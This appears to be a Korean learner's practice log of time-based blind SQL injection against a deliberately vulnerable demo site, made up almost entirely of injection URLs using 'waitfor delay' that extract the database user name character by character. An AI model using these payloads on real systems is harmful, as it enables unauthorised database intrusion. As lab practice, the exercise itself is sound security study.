http://testaspnet.vulnweb.com/
아무 게시글이나 들어가서 아래와 같은 댓글창을 찾아 들어간다.
들어가면 아래와 같은 창이 뜬다.
http://testaspnet.vulnweb.com/Comments.aspx?id=2 AND 1=0 //위 댓글들 안보이게 함
DB아이디 찾아내기
ex) http://192.168.0.24/MySite/board/board_view.asp?num=7;if(ascii(substring((select system_user), 1, 1))>115) waitfor delay '0:0:5'
|
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 1, 1))>97) waitfor delay '0:0:5' →아닌듯 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 1, 1))<122) waitfor delay '0:0:5' →맞나봄 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 1, 1))>=97) waitfor delay '0:0:5' →맞아? → a
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))>=97) waitfor delay '0:0:5' →뭐야? http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))<122) waitfor delay '0:0:5' →맞나 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))<100) waitfor delay '0:0:5' →오래걸려 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))<99) waitfor delay '0:0:5' →빨라 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))=99) waitfor delay '0:0:5' →맞나봄 아까보다 느림 →c
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 3, 1))>110) waitfor delay '0:0:5' →느려 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 3, 1))>118) waitfor delay '0:0:5' →빠름빠름 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 3, 1))>=117) waitfor delay '0:0:5' →느리다 →u → 답 : acunetix ←
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 9, 1))<122) waitfor delay '0:0:5' →빠름 http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 9, 1))>65) waitfor delay '0:0:5' →빠름 |